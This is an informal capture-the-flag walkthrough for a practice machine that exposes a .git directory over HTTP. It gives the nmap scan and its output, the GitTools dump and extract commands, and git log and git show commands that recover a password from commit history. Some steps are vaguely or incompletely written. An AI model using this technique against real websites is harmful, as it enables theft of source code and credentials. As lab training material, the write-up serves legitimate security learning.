Boss wanted me to create a prototype, so here it is! We even used something called version control that made deploying this really easy!
Here is a machine information
|Infor||This is a free room, which means anyone can deploy virtual machines in the room|
We have an IP as usual, and we can start with the basic nmap scan
nmap -sC -sV -A machine-ip
-A : Os detection, version detection, traceroute
-sS : TCP syn scan ( for faster scan, needs root privilege )
-o : For storing output in file </em>
After finishing scan with nmap, we got the result as tcp (80) is open and more interesting directory was found is .git
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 02:35 EDT Nmap scan report for 10.10.242.228 Host is up (0.22s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.14.0 (Ubuntu) | http-git: | 10.10.242.228:80/.git/ | Git repository found! |_ Repository description: Unnamed repository; edit this file 'description' to name the... |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Super Awesome Site! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
What can we do with .git directory?
i tryed to access the .git directory via http://machine-ip/.git
In order to get the contents of the directory, I used this. My favorite search engine is GitTool After clone this tool.
firstly, we need to dump all the file by cmd
./gitdumper.sh http://machine-ip/.git/ gitdump
Then extract it.
./extractor.sh /gitdump /extractor
After finish all the dump and extract. i got this.
In order to get all the files in the previous commits, we run this command
git checkout .
we got all files:
Getting the password
Nomally, when we have the git file. we should run cmd
We can go through all the modification file by run:
git show bc8054d9d95854d278359a432b6d97c27e24061d
We can see all the file change in this commit. We go through all commit with this command. in the e56eaa8e29b589976f33d76bc58a0c4dfb9315b1 object.
Yeah, we got the password now !!!!
Another way, it will not waste your time to much by run:
git log | grep commit | cut -d " " -f2 | xargs git show
This will real all the changed files.